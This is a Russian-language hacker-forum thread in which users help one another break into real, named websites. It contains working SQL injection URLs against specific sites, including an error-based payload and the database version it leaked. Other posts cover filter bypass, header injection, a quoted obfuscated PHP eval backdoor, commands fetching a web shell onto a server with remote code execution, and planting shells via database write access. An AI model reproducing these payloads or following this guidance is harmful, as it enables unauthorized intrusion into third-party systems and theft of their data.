Параметр id= в сайте уязвим, при поставке кавычки вылетает ошибка MySQL. Хавиджем все нормально. Но в ручную никак. Не могу использовать не order+by не group+by не работаю, union + select тоже не работает ? каким способом можно найти количество полей ?


через еррор базед например, кинул бы ссылку чтоле

qaz said:
через еррор базед например, кинул бы ссылку чтоле


http://www.agriculturalcrossing.com/

И где можно кодировать в Char для обхода фильтров ? Или надо свой софт писать ?

Protocoler said:
http://www.agriculturalcrossing.com/
И где можно кодировать в Char для обхода фильтров ? Или надо свой софт писать ?


например в плагине hackbar или онлайн сервисами

Угу, спасибо. Скачаю плагин. Еще вопрос. Мне акунетикс светит уязвимость в заголовке client-ip , но просмотрев заголовки плагином по адресу который указан в акунетиксе, такого заголовка там нет ( Как быть ?

Protocoler said:
Угу, спасибо. Скачаю плагин. Еще вопрос. Мне акунетикс светит уязвимость в заголовке client-ip , но просмотрев заголовки плагином по адресу который указан в акунетиксе, такого заголовка там нет ( Как быть ?


надо отправить хидер с ковычкой)

Так нету куда слать. Просто хидера client_ip нету .

Protocoler said:
Так нету куда слать. Просто хидера client_ip нету .


есть X_FORWARDED_FOR

тебе это надо

Protocoler said:
Угу, спасибо. Скачаю плагин. Еще вопрос. Мне акунетикс светит уязвимость в заголовке client-ip , но просмотрев заголовки плагином по адресу который указан в акунетиксе, такого заголовка там нет ( Как быть ?


Нет там уязвимости, откуда ты взял это?

Наткнулся на


Code:
@preg_replace("\x25\50\x5b\141\x2d\172\x41\55\x5a\60\x2d\71\x2b\7 5\x20\137\x2d\135\x2b\51\x25\145\x73\151","\x65\166\x61\154\x28\47\x24\153\x79\145\x3d\67\x36 \64\x38\70\x3b\47\x2e\142\x61\163\x65\66\x34\137\x 64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64 \145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142 \x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x2 8\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x6b\171\x6 5\75\x37\66\x34\70\x38\73","\x4c\63\x5a\150\x63\151\x39\63\x64\63\x63\166\x64\ 155\x68\166\x63\63\x52\172\x4c\62\x39\171\x63\62\x 4e\157\x62\110\x56\171\x59\62\x67\165\x5a\107\x55\ 166\x61\110\x52\60\x63\107\x52\166\x59\63\x4d\166\ x64\63\x41\164\x59\62\x39\165\x64\107\x56\165\x64\ 103\x39\61\x63\107\x78\166\x59\127\x52\172\x4c\172 \x49\167\x4d\124\x41\166\x4d\104\x55\166\x59\62\x4 6\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\1 06\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107 \x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x 4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");

не бэкдор чейто часом?

blesse said:
Наткнулся на

Code:
@preg_replace("\x25\50\x5b\141\x2d\172\x41\55\x5a\60\x2d\71\x2b\7 5\x20\137\x2d\135\x2b\51\x25\145\x73\151","\x65\166\x61\154\x28\47\x24\153\x79\145\x3d\67\x36 \64\x38\70\x3b\47\x2e\142\x61\163\x65\66\x34\137\x 64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64 \145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142 \x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x2 8\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x6b\171\x6 5\75\x37\66\x34\70\x38\73","\x4c\63\x5a\150\x63\151\x39\63\x64\63\x63\166\x64\ 155\x68\166\x63\63\x52\172\x4c\62\x39\171\x63\62\x 4e\157\x62\110\x56\171\x59\62\x67\165\x5a\107\x55\ 166\x61\110\x52\60\x63\107\x52\166\x59\63\x4d\166\ x64\63\x41\164\x59\62\x39\165\x64\107\x56\165\x64\ 103\x39\61\x63\107\x78\166\x59\127\x52\172\x4c\172 \x49\167\x4d\124\x41\166\x4d\104\x55\166\x59\62\x4 6\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\1 06\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107 \x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x 4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");

не бэкдор чейто часом?


расшифруй,тянется вот сюда:

orschlurch.de/httpdocs/wp-content/uploads/2010/05/cache/

А что за уязвимость такая есть Active script?В гугле искал ничего не нашёл.

Facecontrol said:
А что за уязвимость такая есть Active script?В гугле искал ничего не нашёл.


http://en.wikipedia.org/wiki/Active_Scripting

Такая проблема. Нужно провести инъекцию, но есть одна сложность.

Когда происходит ошибка в скрипте, то происходит редирект на главную.

Я точно уверен, что там есть инъекция, но раскрутить не могу.


Code:
_ttp://clubpodium.ru/delog/cookies.php

Уязвим POST параметр poll_id.

Меня постоянно редиректит на главную, я даже результат запроса просмотреть не могу.

Кто поможет?

MaxFast said:
Такая проблема. Нужно провести инъекцию, но есть одна сложность.
Когда происходит ошибка в скрипте, то происходит редирект на главную.
Я точно уверен, что там есть инъекция, но раскрутить не могу.

Code:
_ttp://clubpodium.ru/delog/cookies.php

Уязвим POST параметр
poll_id
.
Меня постоянно редиректит на главную, я даже результат запроса просмотреть не могу.
Кто поможет?


Можно и без POST обойтись

_http://clubpodium.ru/index.php?section=2&id=-320+union+select+1,2,3,version(),5,6+--+

er9j6@ said:
Можно и без POST обойтись
_http://clubpodium.ru/index.php?section=2&id=-320+union+select+1,2,3,version(),5,6+--+


Да в общем-то как провести инъекцию я знаю, мне мешает редирект. Как вот обойти его?

OxoTnik said:
Браузер опера
http://f3.s.qip.ru/E2nOmNEe.jpg


Спасибо. Раскрутил. Ничего путного не нашёл в БД.

на bitrix какие есть path disclosure?

But how?

http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=%bf'%bf"

http://www.knullis.com/out.php?trade=\%27

Thanks!

lessmore said:
But how?
http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=%bf'%bf"


It's all very simple

_http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=1%22and(select(1)from(select(count(*)),concat((s elect(version())from(information_schema.tables)lim it/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and%22

Duplicate entry '5.0.95' for key 1 Error no:1062

В web.config нашел такую строчку

Как подключится? Я так понял через клиент oracle, если да то где скачать клиент и как подключится?

Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?

Br@!ns said:
Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?


ну да, как и всегда стандартыми методами

Нашел сайт с RCE.

Ввожу: wget http://site.ru/shell.php

Выдает:


Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@mail.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


С curl'ом такая же проблема.

Если написать просто wget:


Usage: wget [OPTION..и т.д


Остальные команды (rm\ls -la\etc) выполняет нормально.

Могу создавать файлы. Правда если:

echo > 1.php

то:

500 Internal Server Error

OxoTnik said:
Программа
Navicat Premium


http://s019.radikal.ru/i637/1306/97/921ef75efa72.jpg

вот такую ошибку выдает

Ups said:
Нашел сайт с RCE.
Ввожу: wget http://site.ru/shell.php
Выдает:
С curl'ом такая же проблема.
Если написать просто wget:
Остальные команды (rm\ls -la\etc) выполняет нормально.
Могу создавать файлы. Правда если:
echo > 1.php
то:
500 Internal Server Error


echo "" > 1.php

и убедись, что есть права на запись.

OxoTnik said:
попробуй через
fetch

Code:
fetch http://site.ru/shell.php



Выполнилось..но и ничего не закачалось.

OxoTnik said:
скинь в ЛС помогу, или в icq мне напиши но скорее всего нет прав,
проверить можно указав пути
Пример
system("cd /tmp/;ls -al");




Code:
ls -al /tmp/

Fatal error: Allowed memory size of 50331648 bytes exhausted (tried to allocate 700 bytes)

В аську отписал.

Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.